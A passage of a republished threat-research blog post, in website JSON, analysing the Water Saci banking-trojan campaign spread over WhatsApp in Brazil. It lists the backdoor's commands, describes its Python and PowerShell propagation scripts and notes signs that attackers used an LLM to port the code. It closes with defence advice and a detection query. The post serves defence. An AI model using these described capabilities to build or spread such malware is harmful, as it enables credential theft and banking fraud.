valign=\"top\">Download file from victim to C&C<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\"><|UploadFile|><\/td>\n<td width=\"263\" valign=\"top\">Upload file from C&C to victim<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"147\" rowspan=\"3\" valign=\"top\">System Control<\/td>\n<td width=\"213\" valign=\"top\"><|RESTART|><\/td>\n<td width=\"263\" valign=\"top\">Force restart the machine<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\"><|CMD|><\/td>\n<td width=\"263\" valign=\"top\">Execute remote command using cmd.exe<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MONKEY|><\/td>\n<td width=\"263\" valign=\"top\">Random input simulation<\/td>\n<\/tr>\n<tr>\n<td width=\"147\" rowspan=\"3\" valign=\"top\">Windows Management<\/td>\n<td width=\"213\" valign=\"top\"><|LIST_WINDOWS|><\/td>\n<td width=\"263\" valign=\"top\">Enumerate all windows<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|LISTMIN_WINDOWS|><\/td>\n<td width=\"263\" valign=\"top\">Minimize windows<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|LISTKILL_WINDOWS|><\/td>\n<td width=\"263\" valign=\"top\">Kill specific windows<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"147\" rowspan=\"6\" valign=\"top\">Monitoring and Evasion<\/td>\n<td width=\"213\" valign=\"top\"><|MOVISIBLE|><\/td>\n<td width=\"263\" rowspan=\"2\" valign=\"top\">Control mouse cursor visibility<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MOINVISIBLE|><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\"><|BLOQUEARMOUSE|><\/td>\n<td width=\"263\" rowspan=\"2\" valign=\"top\">Block\/restore mouse functionality<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|RESTAURARMOUSE|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><zzz|DELETEDKL|><\/td>\n<td width=\"263\" valign=\"top\">Delete keylogger data<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|MENSAGEM|><\/td>\n<td width=\"263\" valign=\"top\">Display custom message<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td width=\"147\" rowspan=\"3\" valign=\"top\">System Information<\/td>\n<td width=\"213\" valign=\"top\"><|GETINFO|> \/ <|LIST_INFO|><\/td>\n<td width=\"263\" valign=\"top\">Gather system information<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\"><|Metodo|><\/td>\n<td width=\"263\" valign=\"top\">Set operational method\/mode<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|Reconected|><\/td>\n<td width=\"263\" valign=\"top\">Handle reconnection<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"147\" rowspan=\"4\" valign=\"top\">Print System Control<\/td>\n<td width=\"213\" valign=\"top\"><|GETPRINTHANLE|><\/td>\n<td width=\"263\" rowspan=\"4\" valign=\"top\">Screen capture for different contexts<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|GETPRINTMAGNIFIER|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|GETPRINTDESKTOP|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|GETPRINTAPP|><\/td>\n<\/tr>\n<tr readability=\"7\">\n<td width=\"147\" rowspan=\"8\" valign=\"top\">Banking\/Financial Malware Features<\/td>\n<td width=\"213\" valign=\"top\"><|CE_ASSI|><\/td>\n<td width=\"263\" rowspan=\"4\" valign=\"top\">Creates fake banking interfaces, Captures credentials and transaction data, specifically targets Brazilian banking systems<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|CE_TRANS|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|CB_SEN|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|CB_UPDATE|><\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|PedidoSenhas|><\/td>\n<td width=\"263\" valign=\"top\">Request passwords<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|SendSenha|><\/td>\n<td width=\"263\" valign=\"top\">Send passwords<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"213\" valign=\"top\"><|HOLE|><\/td>\n<td width=\"263\" rowspan=\"2\" valign=\"top\">Screen overlay management<\/td>\n<\/tr>\n<tr>\n<td width=\"213\" valign=\"top\"><|HOLENOFF|><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-icon-component-text\">Table 5. Backdoor commands granting the operator near-complete remote control over an infected system<\/span><\/center> <\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35.309021113244\">\n<div readability=\"16.673704414587\">\n<p><b>Propagation automation – whatsz.py<\/b><\/p>\n<p>Our analysis revealed that both tadeu.ps1 discussed in our previous <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/25\/j\/active-water-saci-campaign-whatsapp-update.html\" target=\"_blank\">blog entry<\/a> and whatsz.py (Figure 22) are functionally equivalent to the WhatsApp automation malware. The Python sample appears to be an enhanced port of the PowerShell version, maintaining the same workflow, logic, and intent. The extensive use of Python in this stage enables the attackers to automate propagation, streamline payload delivery, and enhance the flexibility and resilience of their malicious operations.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci22.png\" alt=\"Figure 22. Component files downloaded by instalar.bat and used by whatsz.py\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 22. Component files downloaded by instalar.bat and used by whatsz.py<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"37\">\n<div readability=\"19\">\n<p>When <i>instalar.bat<\/i> was executed, it downloaded component files including Python 3.12.7, get-pip.py, and the chromedriver.exe needed by the Python script to function properly and carry out its propagation routine (Figure 23). Both the PowerShell (tadeu.ps1) and Python (whatsz.py) scripts basically do the same things. They automate WhatsApp via Selenium, inject the WA\u2011JS library, grab contact lists, send files automatically (using Base64 encoding), load remote configurations, pause and resume tasks, and report progress back to a C&C server.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci23.png\" alt=\"Figure 23. Execution of instalar.bat leading to the Python script routine as seen in Vision One\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 23. Execution of instalar.bat leading to the Python script routine as seen in Vision One<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div class=\"responsive-table-wrap\" readability=\"9\">\n<p>Table 6 compares the previous PowerShell-based propagation routine with the newly observed Python variant, highlighting their shared automation features and enhancements in the latest campaign.<\/p>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td width=\"311\"><b>Feature<\/b><\/td>\n<td width=\"120\"><b>PowerShell (tadeu.ps1)<\/b><\/td>\n<td width=\"112\"><b>Python (whatsz.py)<\/b><\/td>\n<td><b>Match?<\/b><\/td>\n<\/tr>\n<\/tbody>\n<tbody readability=\"4\">\n<tr readability=\"2\">\n<td width=\"311\">WhatsApp automation via Selenium<\/td>\n<td width=\"120\">\u2713<\/td>\n<td width=\"112\">\u2713<\/td>\n<td><b>YES<\/b><\/td>\n<\/tr>\n<tr>\n<td width=\"311\">WA-JS library injection<\/td>\n<td width=\"120\">\u2713<\/td>\n<td width=\"112\">\u2713<\/td>\n<td><b>YES<\/b><\/td>\n<\/tr>\n<tr>\n<td width=\"311\">Mass contact extraction<\/td>\n<td width=\"120\">\u2713<\/td>\n<td width=\"112\">\u2713<\/td>\n<td><b>YES<\/b><\/td>\n<\/tr>\n<tr>\n<td width=\"311\">Automated file sending<\/td>\n<td width=\"120\">\u2713<\/td>\n<td width=\"112\">\u2713<\/td>\n<td><b>YES<\/b><\/td>\n<\/tr>\n<tr>\n<td width=\"311\">Base64 file encoding<\/td>\n<td width=\"120\">\u2713<\/td>\n<td width=\"112\">\u2713<\/td>\n<td><b>YES<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"311\">Remote configuration loading<\/td>\n<td width=\"120\">\u2713<\/td>\n<td width=\"112\">\u2713<\/td>\n<td><b>YES<\/b><\/td>\n<\/tr>\n<tr>\n<td width=\"311\">Pause\/resume system<\/td>\n<td width=\"120\">\u2713<\/td>\n<td width=\"112\">\u2713<\/td>\n<td><b>YES<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"311\">Progress reporting to C&C<\/td>\n<td width=\"120\">\u2713<\/td>\n<td width=\"112\">\u2713<\/td>\n<td><b>YES<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"311\">Contact list exfiltration<\/td>\n<td width=\"120\">\u2713<\/td>\n<td width=\"112\">\u2713<\/td>\n<td><b>YES<\/b><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-icon-component-text\">Table 6. Comparison of features between the PowerShell-based propagation routine and the Python variant<\/span><\/center> <\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"36.5\">\n<div readability=\"18\">\n<p>Given the similarity of logic, the injected JavaScript, and the explicit description included in the Python code itself, <i>\u201cWhatsApp Automation Script \u2013 Versao Python Convertido de PowerShell para Python Suporte para Chrome, Edge e Firefox\u201d<\/i> (Figure 24), there is compelling circumstantial evidence that an automated aid, such as a large language model (LLM) or code-translation tool, may have been used to accelerate the porting process. LLMs have proven capabilities for translating and refactoring code across languages and are commonly used for tasks like legacy migration and cross-language translation. While this observation doesn\u2019t definitively prove that an LLM was involved, it strongly supports the plausibility that one could have sped up the conversion.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci24.png\" alt=\"Figure 24. Python script header explicitly stating it was converted from PowerShell\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 24. Python script header explicitly stating it was converted from PowerShell<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32.5\">\n<div readability=\"10\">\n<p>Figures 25 and 26 display additional sections of the script that suggest the use of an LLM to expedite the conversion process. The snippets provided further illustrate potential interactions with AI, where requests for enhancements are made. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci25.png\" alt=\"Figure 25. The text: \u201dsend message to a contact \u2013 version optimized with errors handling\u201d\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 25. The text: \u201dsend message to a contact \u2013 version optimized with errors handling\u201d<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci26.png\" alt=\"Figure 26. The text: \u201d Send message to multiple contacts at same time \u2013 super fast!\u201d\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 26. The text: \u201d Send message to multiple contacts at same time \u2013 super fast!\u201d<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"32\">\n<div readability=\"9\">\n<p>Notably, the script includes optimized messaging functions and a main automation class with comprehensive formatting for different statuses (Figure 27).<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci27.png\" alt=\"Figure 27. Main automation class with formatting definitions for different statuses\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 27. Main automation class with formatting definitions for different statuses<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"33\">\n<div readability=\"11\">\n<p>The script produces highly interesting and colorful output, including the use of emojis in console outputs, while running in the background (Figure 28). This is atypical for manually written automation scripts and may indicate AI-generated code designed for enhanced user experience.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"image\">\n<figure class=\"image-figure\"> <img decoding=\"async\" src=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/WaterSaci28.png\" alt=\"Figure 28. Example of colorful and emoji-enhanced console output, suggesting possible AI-generated script features.\"> <\/p>\n<div class=\"caption-image-container \"><figcaption>Figure 28. Example of colorful and emoji-enhanced console output, suggesting possible AI-generated script features.<\/figcaption><\/div>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"37\">\n<div readability=\"19\">\n<p>Despite the logic similarity, improvements were made that materially increase the Python variant\u2019s reach, reliability, and operational flexibility; this suggests that the port isn\u2019t just a straight translation but an upgrade. The Python build shifts to a more portable runtime, separates concerns into clearer classes, adds richer error handling and batch-sending capabilities, and broadens browser support (Table 7). Together, these changes make propagation faster, more resilient to failure, and easier to maintain or extend. <\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\">\n<div class=\"responsive-table-wrap\"> <center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td><b>Aspect<\/b><\/td>\n<td><b>PowerShell<\/b><\/td>\n<td><b>Python<\/b><\/td>\n<td><b>Significance<\/b><\/td>\n<\/tr>\n<\/tbody>\n<tbody readability=\"3\">\n<tr>\n<td><b>Language<\/b><\/td>\n<td>PowerShell<\/td>\n<td>Python 3<\/td>\n<td>Port\/translation<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><b>Browser support<\/b><\/td>\n<td>Chrome only<\/td>\n<td>Chrome\/Edge\/Firefox<\/td>\n<td>Enhanced capability and wider reach<\/td>\n<\/tr>\n<tr>\n<td><b>Code organization<\/b><\/td>\n<td>Functions<\/td>\n<td>Object-oriented (class)<\/td>\n<td>Better structure<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><b>Error handling<\/b><\/td>\n<td>Basic try-catch<\/td>\n<td>Enhanced with specific handlers<\/td>\n<td>More robust<\/td>\n<\/tr>\n<tr>\n<td><b>Batch sending<\/b><\/td>\n<td>Individual only<\/td>\n<td>Individual + batch mode<\/td>\n<td>Faster spreading<\/td>\n<\/tr>\n<tr>\n<td><b>Headless mode<\/b><\/td>\n<td>Supported<\/td>\n<td>Supported (enhanced)<\/td>\n<td>Stealth operation<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><b>Contact filtering<\/b><\/td>\n<td>Basic<\/td>\n<td>Enhanced (@lid filtering)<\/td>\n<td>Better targeting<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-icon-component-text\">Table 7. improvements to the Python variant compared to PowerShell variant<\/span><\/center> <\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"49\">\n<div readability=\"43\">\n<h2><span class=\"body-subhead-title\">Conclusion<\/span><\/h2>\n<p>The Water Saci campaign exemplifies a new era of cyber threats in Brazil, where attackers exploit the trust and reach of popular messaging platforms like WhatsApp to orchestrate large-scale, self-propagating malware campaigns. By weaponizing familiar communication channels and employing advanced social engineering, threat actors are able to swiftly compromise victims, bypass traditional defenses, and sustain persistent banking trojan infections. This campaign demonstrates how legitimate platforms can be transformed into powerful vectors for malware delivery and underscores the growing sophistication of cybercriminal operations in the region.<\/p>\n<p>The campaign\u2019s multi-stage infection chain \u2013 spanning malicious HTA files, MSI installers, and advanced Python-based automation \u2013 underscores the increasing complexity of today\u2019s threats. Notably, the integration of propagation automation via WhatsApp, anti-analysis measures, and robust persistence mechanisms enables attackers to maximize reach while evading detection and maintaining long-term access to compromised systems.<\/p>\n<p>This analysis highlights the urgent need for organizations and individuals to adopt a multi-layered security approach. Proactive measures such as disabling auto-downloads in messaging applications, restricting file transfers, enhancing user awareness, and deploying advanced endpoint security solutions are crucial in defending against sophisticated, script-based threats like Water Saci.<\/p>\n<p>As attackers continue to innovate, leveraging both technical and social vectors, it is imperative to combine robust technology with continuous education and vigilant security practices. Trend Micro remains committed to monitoring these evolving threats, providing actionable intelligence, and empowering organizations to stay ahead of the adversaries.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"33.5\">\n<div readability=\"12\">\n<h2><span class=\"body-subhead-title\">Defense recommendations\u202f<\/span><\/h2>\n<p>To minimize the risks associated with the Water Saci campaign, Trend recommends several practical initial defense items:\u202f <\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Disable auto-downloads on WhatsApp.<span> Turn off automatic downloads of media and documents in WhatsApp settings to reduce accidental exposure to malicious files.\u202f <\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\">Control file transfers on personal apps.<span> Use endpoint security or firewall policies to block or restrict file transfers through personal applications like WhatsApp, Telegram, or WeTransfer on company-managed devices. If your organization supports BYOD, enforce strict app whitelisting or containerization to protect sensitive environments.\u202f <\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\">Enhance user awareness. <span>The victimology of the Water Saci campaign suggests that attackers are targeting enterprises. Regular security training helps an organization\u2019s employees recognize the dangers of downloading files via messaging platforms. Advise users to avoid clicking on unexpected attachments or suspicious links, even when they come from known contacts, and promote the use of secure, approved channels for transferring business documents.\u202f <\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\">Enhance email and communication security controls. <span>Restrict access to personal email and messaging apps on corporate devices. Use web and email gateways with URL filtering to block known malicious C&C and phishing domains. <\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\">Enforce multi-factor authentication (MFA) and session hygiene. <span>Require MFA for all cloud and web services to prevent session hijacking. Advise users to log out after using messaging apps and regularly clear browser cookies and tokens. <\/span><\/span><\/li>\n<li><span class=\"rte-red-bullet\">Deploy advanced endpoint security solutions. <span>Use Trend\u2019s endpoint security platforms (such as Trend Micro Apex One\u2122 or Vision One) to detect and block suspicious script-based attacks, fileless malware, and automation abuse. Enable behavioral monitoring to catch unauthorized VBS\/PowerShell execution, browser profile alterations, and lateral movement attempts related to WhatsApp and similar threats. <\/span><\/span><\/li>\n<\/ul>\n<p>Implementing these recommendations will help organizations and individuals better defend against malware threats delivered through messaging applications.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"31.096097560976\">\n<div readability=\"19.962926829268\">\n<h2><span class=\"body-subhead-title\">Proactive security with Trend Vision One\u2122\u202f<\/span><\/h2>\n<p><a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/one-platform.html\" target=\"_blank\">Trend Vision One<\/a>\u2122 is the only AI-powered enterprise cybersecurity platform that centralizes cyber risk exposure management and security operations, delivering robust layered protection across on-premises, hybrid, and multi-cloud environments. <\/p>\n<p>The following sections contain Trend Vision One insights, reports, and queries mentioned in the previous blog with additional information from this report. <\/p>\n<h3><span class=\"body-subhead-title\">Trend Vision One Threat Intelligence\u202f<\/span><\/h3>\n<p>To stay ahead of evolving threats, Trend customers can access <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/threat-intelligence.html\" target=\"_blank\">Trend Vision One Threat Insights<\/a> which provides the latest insights from Trend\u2122 Research on emerging threats and threat actors. <\/p>\n<p><b>Trend Vision One Threat Insights\u202f\u202f<\/b><\/p>\n<p><b>Trend Vision One Intelligence Reports (IOC Sweeping)\u202f\u202f<\/b><\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"35.19978858351\">\n<div readability=\"15.864693446089\">\n<h4>Hunting Queries\u202f\u202f<\/h4>\n<h5>Trend Vision One Search App\u202f\u202f<\/h5>\n<p>Trend Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.\u202f<\/p>\n<p><i><b>Detect process creation events where a randomly named .exe executes a randomly named .log file.<\/b><\/i><\/p>\n<p><span class=\"blockquote\">eventSubId:2 AND processCmd:\/[A-Za-z0-9]{6,}\\.exe [A-Za-z0-9]{6,}\\.log\/<\/span><\/p>\n<h2><span class=\"body-subhead-title\">Indicators of Compromise (IoCs)<\/span><\/h2>\n<p>The indicators of compromise for this entry can be found <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/25\/l\/water-saci\/IOCs_WaterSaci.txt\"><span class=\"bs-modal\">here<\/span><\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p>   <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p>  <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/25\/l\/water-saci.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Through AI-driven code conversion and a layered infection chain involving different file formats and scripting languages, the threat actors behind Water Saci are quickly upgrading their malware delivery and propagation methods across WhatsApp in Brazil. Read More HERE…<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9510,10938,9509],"class_list":["post-59779","post","type-post","status-publish","format-standard","hentry","category-trendmicro","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-artificial-intelligence-ai","tag-trend-micro-research-research"],"yoast_head":"\n<title>Unraveling Water Saci's New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Unraveling Water Saci's New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-02T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/WaterSaci_thumbnail:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"25 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Unraveling Water Saci’s New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp\",\"datePublished\":\"2025-12-02T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/\"},\"wordCount\":5058,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/WaterSaci_thumbnail:Large?qlt=80\",\"keywords\":[\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Artificial Intelligence (AI)\",\"Trend Micro Research : Research\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/\",\"name\":\"Unraveling Water Saci's New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/WaterSaci_thumbnail:Large?qlt=80\",\"datePublished\":\"2025-12-02T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/#primaryimage\",\"url\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/WaterSaci_thumbnail:Large?qlt=80\",\"contentUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/WaterSaci_thumbnail:Large?qlt=80\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/unraveling-water-sacis-new-multi-format-ai-enhanced-attacks-propagated-via-whatsapp\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : Articles, News, Reports\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-articles-news-reports\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Unraveling Water Saci’s New Multi-Format, AI-Enhanced Attacks Propagated via WhatsApp\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - 